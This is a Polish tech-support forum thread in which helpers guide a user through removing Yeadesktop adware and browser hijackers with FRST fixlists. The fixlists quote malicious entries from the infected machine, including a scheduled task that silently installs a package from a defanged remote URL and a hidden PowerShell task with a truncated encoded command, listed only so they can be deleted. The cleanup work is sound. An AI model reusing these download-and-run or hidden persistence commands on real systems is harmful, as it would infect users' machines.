Elektroda.pl
Elektroda.pl
X
Proszę, dodaj wyjątek www.elektroda.pl do Adblock.
Dzięki temu, że oglądasz reklamy, wspierasz portal i użytkowników.

Yeadeskop i wyskakujace reklamy

rcthedj 24 Maj 2017 22:58 552 11
  • #1 24 Maj 2017 22:58
    rcthedj
    Poziom 4  

    Witam,

    Potrzebuje pomocy ponieważ w żaden sposób nie mogę się pozbyć Yeadeskop i ciągle pojawiających się reklam.
    Żadne moje próby nie przynoszą efektów.

    Proszę o pomoc

    0 11
  • Pomocny post
    #2 24 Maj 2017 23:01
    Kasek21
    Poziom 43  

    Zamieść wymagane logi!

    0
  • Pomocny post
    #4 25 Maj 2017 06:14
    krzychupar
    Poziom 40  

    Odinstaluj:

    hohosearch - Uninstall (HKLM-x32\...\{C191F216-7A56-4009-A23D-3A0E24FFADF4}) (Version: - ) <==== UWAGA

    Otwórz notatnik systemowy i wklej:

    Task: {0952875A-816F-4E4F-BC13-1DE2E07B69C7} - System32\Tasks\Microsoft\Windows\DeviceSettings\Phumatherqukuch => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/oc...JC3T0_WXK1E1522SWNE1522SWN&amp;d=20170524 /q <==== UWAGA
    Task: {17050922-3BBE-4F3B-8C04-8E2FE5B61A0B} - System32\Tasks\{7A7F0C47-7F09-0A7D-0E11-0E0D790B1179} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand IAAgADsAIAA7ADsAIAA7ACAAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAiAHMAdABvAHAAIgA7ACQAcwBjAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAkAFcAYQByAG4AaQBuAGcAUAByAGUAZgBlAHIAZQBuAGMA (dane wartości zawierają 10072 znaków więcej). <==== UWAGA
    Task: {1C9D6A54-2896-4508-AAC7-C88E0D28B87D} - System32\Tasks\SmileGour => Rundll32.exe "C:\Program Files\SmileGour\SmileGour.dll",uzUkhiSfmf
    Task: {8A39DC71-5DE2-4212-80E8-07C6C581950D} - System32\Tasks\SystemHealer Run Delay => C:\Program Files (x86)\SystemHealer\SystemHealer.exe <==== UWAGA
    Task: {A02316E4-5F99-45D8-87F1-170747A875B4} - System32\Tasks\SystemToolsDailyTest => uaclauncher.exe
    Task: {B7C9E4D3-61E2-49D9-ACC0-C3FC92007414} - System32\Tasks\SystemHealer Monitor => C:\Program Files (x86)\SystemHealer\HealerConsole.exe <==== UWAGA
    Task: {C344828C-E8F4-408A-A6DD-920FEF9C3F81} - System32\Tasks\PCDDataUploadTask => uaclauncher.exe
    Task: {F75757BA-DB71-4412-993B-42CAFF66B847} - System32\Tasks\System Healer Task => C:\PROGRA~2\SYSTEM~1\RESCUE~1.EXE <==== UWAGA
    TWMI_ActiveScriptEventConsumer_ASEC: <===== UWAGA
    Shortcut: C:\Users\dell\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VirtualDJ\Online Help.lnk -> hxxp://www.virtualdj.com/wiki
    Shortcut: C:\Users\dell\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VirtualDJ\www.virtualdj.com.lnk -> hxxp://www.virtualdj.com
    Shortcut: C:\Users\dell\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Virtual DJ\Online Help.lnk -> hxxp://www.virtualdj.com/support
    Shortcut: C:\Users\dell\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Virtual DJ\www.virtualdj.com.lnk -> hxxp://www.virtualdj.com
    Shortcut: C:\Users\dell\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Image-Line\FL Studio 9\Additional\SynthMaker website.lnk -> hxxp://www.synthmaker.co.uk




    ShortcutWithArgument: C:\Users\dell\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk -> C:\Program Files\MMozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www.yeadesktop.com/
    ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk -> C:\Program Files\MMozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www.yeadesktop.com/
    ShortcutWithArgument: C:\Users\Public\Desktop\Mozilla Firefox.lnk -> C:\Program Files\MMozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www.yeadesktop.com/
    Hosts:
    HKLM\...\RunOnce: [OMEWPRODUCT_C5JTJ] => C:\Program Files (x86)\zatcx3fz3bp\144CWMM2UD2O3MS.exe [64000 2017-05-24] (NVZXRL) <===== UWAGA
    HKU\S-1-5-21-603311595-3298310252-627542946-1001\...\Run: [o5tr2w54cci] => C:\Users\dell\AppData\Roaming\pi1zwjl1apo\ggempqahafv.exe [7680 2017-05-24] ()
    HKU\S-1-5-21-603311595-3298310252-627542946-1001\...\Run: [r1fog3rhlyh] => C:\Users\dell\AppData\Roaming\fwlhkzusros\whufiwgdawz.exe [7680 2017-05-24] ()
    HKU\S-1-5-21-603311595-3298310252-627542946-1001\...\Run: [oavk441pb0t] => C:\Users\dell\AppData\Roaming\ffugqhupjp4\1cp3mwjljzk.exe [7680 2017-05-24] ()
    HKU\S-1-5-21-603311595-3298310252-627542946-1001\...\Run: [1KUVCLDH0RV5ZTH] => C:\Program Files (x86)\zatcx3fz3bp\HE8OT.exe [1041408 2017-05-24] (NVZXRL)
    HKU\S-1-5-21-603311595-3298310252-627542946-1001\...\MountPoints2: {1bcaf08b-c5ff-11e6-9d88-f8cab8251f54} - "J:\Autorun.exe"
    HKU\S-1-5-21-603311595-3298310252-627542946-1001\...\MountPoints2: {1bcaf090-c5ff-11e6-9d88-f8cab8251f54} - "H:\INTRO.EXE"
    HKU\S-1-5-21-603311595-3298310252-627542946-1001\...\MountPoints2: {1bcaf096-c5ff-11e6-9d88-f8cab8251f54} - "J:\Autorun.exe"
    HKU\S-1-5-21-603311595-3298310252-627542946-1001\...\MountPoints2: {7b24b11c-8313-11e6-9cfd-780cb8ad9e12} - "G:\setup.exe"
    ShellExecuteHooks: Brak nazwy - {866BE936-3EB3-11E7-9918-64006A5CFC23} - C:\Users\dell\AppData\Roaming\Kepuph\Herfusetreph.dll -> Brak pliku
    HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank
    HKU\S-1-5-21-603311595-3298310252-627542946-1001\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
    CHR HomePage: gudercultshterryanatock -> hxxp://www.initialsite123.com/?z=ff1cd7dd37c6...JPVX-75JC3T0_WXK1E1522SWNE1522SWN&type=hp
    CHR StartupUrls: gudercultshterryanatock -> "hxxp://www.initialsite123.com/?z=ff1cd7dd37c6e25fc7c2860g5z4tfwaq0g1t8wde6b&from=icb&uid=WDCXWD10JPVX-75JC3T0_WXK1E1522SWNE1522SWN&type=hp"
    CHR DefaultSearchURL: gudercultshterryanatock -> hxxp://www.initialsite123.com/search/?q={searchTerms}&z=ff1cd7dd37c6e25fc7c2860g5z4tfwaq0g1t8wde6b&from=icb&uid=WDCXWD10JPVX-75JC3T0_WXK1E1522SWNE1522SWN&type=sp
    CHR DefaultSearchKeyword: gudercultshterryanatock -> initialsite123
    CHR Profile: C:\Users\dell\AppData\Local\Google\Chrome\User Data\gudercultshterryanatock [2017-05-24] <==== UWAGA
    CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx <nie znaleziono>
    S2 tw1125916000; C:\ProgramData\tw1125916000.exe [324808 2017-05-24] ()
    2017-05-24 11:52 - 2017-05-24 11:52 - 00016792 _____ C:\WINDOWS\System32\Tasks\SmileGour
    2017-05-24 11:52 - 2017-05-24 11:52 - 00000000 ____D C:\Users\dell\AppData\Roaming\pi1zwjl1apo
    2017-05-24 11:52 - 2017-05-24 11:52 - 00000000 ____D C:\Users\dell\AppData\Roaming\fwlhkzusros
    2017-05-24 11:52 - 2017-05-24 11:52 - 00000000 ____D C:\Users\dell\AppData\Roaming\ffugqhupjp4
    2017-05-24 11:52 - 2017-05-24 11:52 - 00000000 ____D C:\Program Files\OVOG4M7G0U
    2017-05-24 11:52 - 2017-05-24 11:52 - 00000000 ____D C:\Program Files\MLVDG9E5OE
    2017-05-24 11:52 - 2017-05-24 11:52 - 00000000 ____D C:\Program Files\4UIN8VO3R9
    2017-05-24 11:52 - 2017-05-24 11:52 - 00000000 ____D C:\Program Files\3VPJW9550U
    2017-05-24 11:52 - 2017-05-24 11:52 - 00000000 ____D C:\Program Files (x86)\zatcx3fz3bp
    2017-05-24 11:51 - 2017-05-24 11:51 - 00324808 _____ C:\ProgramData\tw1125916000.exe
    2017-05-24 11:51 - 2017-05-24 11:51 - 0324808 _____ () C:\ProgramData\tw1125916000.exe
    2017-05-24 11:51 - 2017-05-24 22:25 - 00003433 _____ C:\ProgramData\log.ewbt
    2017-05-24 11:51 - 2017-05-24 22:25 - 00000128 _____ C:\ProgramData\log.ewbb
    2017-05-24 11:51 - 2017-05-24 22:24 - 00000000 ____D C:\Program Files (x86)\Btickmerjuing Log
    2017-05-24 11:51 - 2017-05-24 13:03 - 00000000 ____D C:\Users\dell\AppData\Roaming\Kepuph
    2017-05-24 11:51 - 2017-05-24 11:52 - 00000000 ____D C:\Users\dell\AppData\Local\Clodent
    2017-05-24 11:51 - 2017-05-24 11:51 - 00324808 _____ C:\ProgramData\tw1125916000.exe
    2017-05-24 11:51 - 2017-05-24 11:51 - 00006134 _____ C:\WINDOWS\System32\Tasks\Btickmerjuing Log
    2017-05-24 11:51 - 2017-05-24 11:51 - 00000000 ____D C:\Program Files (x86)\Ataricklermerch
    2017-05-24 09:59 - 2017-05-24 10:09 - 00000000 ____D C:\Users\dell\Desktop\House (3)
    2017-05-16 14:42 - 2016-07-16 13:36 - 00000000 ____D C:\WINDOWS\CbsTemp
    C:\Program Files (x86)\zatcx3fz3bp\144CWMM2UD2O3MS.exe
    C:\ProgramData\tw1125916000.exe
    EmptyTemp:

    Plik zapisz pod nazwą fixlist.txt i umieść obok FRST w tym samym folderze.
    Uruchom FRST i kliknij w Fix/Napraw.

    0
  • Pomocny post
    #5 25 Maj 2017 08:00
    Kolobos
    Spec od komputerów

    Po wykonaniu zamiesc nowe logi z FRST, ze skanowania.

    0
  • Pomocny post
    #7 25 Maj 2017 10:28
    Kolobos
    Spec od komputerów

    Zgraj zakladki z Chrome, profil przegladarki zostanie usuniety.
    Usun tez dane synchronizacji przegladarki z konta google (o ile synchronizujesz).

    Odinstaluj:
    hohosearch - Uninstall <- wpis mozesz tez usunac przy pomocy regedit z klucza uninstall.
    initialsite123 - Uninstall

    Wykonaj Fixlist.txt dla FRST:
    CloseProcesses:
    Task: {15137A9A-7A10-468F-90CB-16C0112EE02B} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-05-25] () <==== UWAGA
    Task: {287BF10D-3333-4C81-B941-64805D43B249} - \Btickmerjuing Log -> Brak pliku <==== UWAGA
    Task: {A79AF8BF-7070-4552-BDE8-3D5C548710A1} - System32\Tasks\Vatiry Manager => C:\Program Files (x86)\Coicersyghermutain\yaupdcache.exe [2017-05-25] ()
    (DBQZLC9) C:\Program Files\KW581BQBLS\GVIRHTEOK.exe
    (DBQZLC9) C:\Program Files\E094CZK2E7\R9I5FMJMY.exe
    (DBQZLC9) C:\Program Files\R83FHZPZ56\R83FHZPZ5.exe
    HKU\S-1-5-21-603311595-3298310252-627542946-1001\...\Run: [0l4dkwz5zmp] => C:\Users\dell\AppData\Roaming\zuhoahlyug1\cyfsuou5are.exe [7680 2017-05-25] ()
    HKU\S-1-5-21-603311595-3298310252-627542946-1001\...\Run: [YO242YORYT0DKA4] => C:\Program Files\KW581BQBLS\GVIRHTEOK.exe [1202688 2017-05-25] (DBQZLC9)
    HKU\S-1-5-21-603311595-3298310252-627542946-1001\...\Run: [wcqkqytnugm] => C:\Users\dell\AppData\Roaming\nc4ltztspyo\wu0sli3rl5j.exe [7680 2017-05-25] ()
    HKU\S-1-5-21-603311595-3298310252-627542946-1001\...\Run: [mxqwqwk2l5u] => C:\Users\dell\AppData\Roaming\zigeon35jdj\fiktaxrveyo.exe [7680 2017-05-25] ()
    HKU\S-1-5-21-603311595-3298310252-627542946-1001\...\Run: [W11XEMQQYZSWW7Q] => C:\Program Files\E094CZK2E7\R9I5FMJMY.exe [1202688 2017-05-25] (DBQZLC9)
    HKU\S-1-5-21-603311595-3298310252-627542946-1001\...\Run: [KL0RT67432APNA5] => C:\Program Files\R83FHZPZ56\R83FHZPZ5.exe [1202688 2017-05-25] (DBQZLC9)
    HKLM\...\Providers\x067rr9p: C:\Program Files (x86)\Btickmerjuing Log\local64spl.dll
    ShellExecuteHooks: Brak nazwy - {63882DA6-3EB7-11E7-B5E3-64006A5CFC23} - C:\Users\dell\AppData\Roaming\Ropaarediing\Kodetainatilck.dll [145920 2017-05-25] ()
    FF ProfilePath: C:\Users\dell\AppData\Roaming\Mozilla\Firefox\naweriweentcofise\Profiles\mkujzk9h.default-1495622189506\Profiles\mkujzk9h.default-1495622189506 [nie znaleziono]
    FF SearchPlugin: C:\Users\dell\AppData\Roaming\Mozilla\Firefox\Profiles\mkujzk9h.default-1495622189506\searchplugins\2rv50r20.xml [2017-05-25]
    CHR DefaultProfile: pigerghtatenecultaretodom
    CHR HomePage: pigerghtatenecultaretodom -> hxxp://www.initialsite123.com/?z=ffe4e5f4fd79...JPVX-75JC3T0_WXK1E1522SWNE1522SWN&type=hp
    CHR StartupUrls: pigerghtatenecultaretodom -> "hxxp://www.initialsite123.com/?z=ffe4e5f4fd7902f0a5c17c7gbz1tfw5qbtebao5q3o&from=isr2&uid=WDCXWD10JPVX-75JC3T0_WXK1E1522SWNE1522SWN&type=hp"
    CHR DefaultSearchURL: pigerghtatenecultaretodom -> hxxp://www.initialsite123.com/search/?q={searchTerms}&z=ffe4e5f4fd7902f0a5c17c7gbz1tfw5qbtebao5q3o&from=isr2&uid=WDCXWD10JPVX-75JC3T0_WXK1E1522SWNE1522SWN&type=sp
    CHR DefaultSearchKeyword: pigerghtatenecultaretodom -> initialsite123
    CHR Profile: C:\Users\dell\AppData\Local\Google\Chrome\User Data\pigerghtatenecultaretodom [2017-05-25] <==== UWAGA
    C:\Users\dell\AppData\Local\Google\Chrome\User Data\pigerghtatenecultaretodom
    CHR Extension: (Płatności w sklepie Chrome Web Store) - C:\Users\dell\AppData\Local\Google\Chrome\User Data\pigerghtatenecultaretodom\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-01-09]
    CHR Extension: (Chrome Media Router) - C:\Users\dell\AppData\Local\Google\Chrome\User Data\pigerghtatenecultaretodom\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-01-11]
    R2 BIT; C:\ProgramData\BIT\BIT.dll [1811968 2017-05-25] (TODO: <公司名>) [Brak podpisu cyfrowego] <==== UWAGA
    R2 snare; C:\Users\dell\AppData\Local\snare\Snare.dll [898048 2017-05-25] (IntertSect Alliance Pty Ltd) [Brak podpisu cyfrowego] <==== UWAGA
    R2 WinSAPSvc; C:\Users\dell\AppData\Roaming\WinSAPSvc\WinSAP.dll [1887232 2017-05-25] (TODO: <公司名>) [Brak podpisu cyfrowego] <==== UWAGA
    R1 cryptfd; C:\WINDOWS\System32\drivers\cryptfd.sys [193448 2017-04-18] ()
    2017-05-25 09:46 - 2017-05-25 09:46 - 00003678 _____ C:\WINDOWS\System32\Tasks\Milimili
    2017-05-25 09:46 - 2017-05-25 09:46 - 00000000 ____D C:\ProgramData\BIT
    2017-05-25 09:46 - 2017-05-25 09:46 - 00000000 ____D C:\Program Files (x86)\MIO
    2017-05-25 09:45 - 2017-05-25 09:45 - 00000000 ____D C:\Users\dell\AppData\Roaming\WinSAPSvc
    2017-05-25 09:45 - 2017-05-25 09:45 - 00000000 ____D C:\Users\dell\AppData\Local\snare
    2017-05-25 09:45 - 2017-05-25 09:45 - 00000000 ____D C:\Cosusp
    2017-05-25 09:44 - 2017-05-25 09:45 - 00000000 ____D C:\Program Files (x86)\Coicersyghermutain
    2017-05-25 09:44 - 2017-05-25 09:44 - 00006082 _____ C:\WINDOWS\System32\Tasks\Vatiry Manager
    2017-05-25 09:44 - 2017-05-25 09:44 - 00000000 ____D C:\Users\dell\AppData\Roaming\Ropaarediing
    2017-05-25 09:44 - 2017-05-25 09:44 - 00000000 ____D C:\Users\dell\AppData\Roaming\Microleaves
    2017-05-25 09:44 - 2017-05-25 09:44 - 00000000 ____D C:\Users\dell\AppData\Local\Mihatgrerwidom
    2017-05-25 09:44 - 2017-05-25 09:44 - 00000000 ____D C:\Users\dell\AppData\Local\AdvinstAnalytics
    2017-05-25 09:44 - 2017-05-25 09:44 - 00000000 ____D C:\Program Files (x86)\Vatiry Manager
    2017-05-25 09:43 - 2017-05-25 09:44 - 00000000 ____D C:\Program Files\R83FHZPZ56
    2017-05-25 09:43 - 2017-05-25 09:44 - 00000000 ____D C:\Program Files\E094CZK2E7
    2017-05-25 09:43 - 2017-05-25 09:43 - 00000000 ____D C:\Users\dell\AppData\Roaming\zuhoahlyug1
    2017-05-25 09:43 - 2017-05-25 09:43 - 00000000 ____D C:\Users\dell\AppData\Roaming\zigeon35jdj
    2017-05-25 09:43 - 2017-05-25 09:43 - 00000000 ____D C:\Users\dell\AppData\Roaming\nc4ltztspyo
    2017-05-25 09:43 - 2017-05-25 09:43 - 00000000 ____D C:\Program Files\KW581BQBLS
    2017-05-24 22:25 - 2017-05-24 22:26 - 00000132 _____ C:\ProgramData\log.binb

    0
  • Pomocny post
    #9 25 Maj 2017 11:21
    Kolobos
    Spec od komputerów

    W regedit szukaj po identyfikatorach:
    C191F216-7A56-4009-A23D-3A0E24FFADF4
    oraz:
    BDEF7AA7-3E2F-46D7-B1C6-42309ADD6621

    Usun katalog C:\FRST i to wszystko.

    0
  • #10 25 Maj 2017 11:27
    rcthedj
    Poziom 4  

    W kluczu uninstall w rejestrze nie występują pliki po tych identyfikatorach, w opcji znajdź w rejestrze także nie wyszukuje tych identyfikatorów.

    1
  • #11 25 Maj 2017 11:29
    Kolobos
    Spec od komputerów

    Skoro wyswietlaja sie w logach to sa w rejestrze, cos robisz zle.

    Wyszukaj samo: 3A0E24FFADF4 oraz 42309ADD6621, oczywiscie przez opcje znajdz, a nie recznie!

    0
  • #12 25 Maj 2017 11:42
    rcthedj
    Poziom 4  

    Usunięte, znikło z dodaj/usuń programy :)

    Usunięty katalog C:\FRST

    Dziękuje Bardzo za pomoc :) Wszystko wróciło do należytego porządku :) Prawdziwy z Cb spec od komputerów :)

    Pozdrawiam i Wszystkiego Dobrego :) Trzymaj sie :)

    0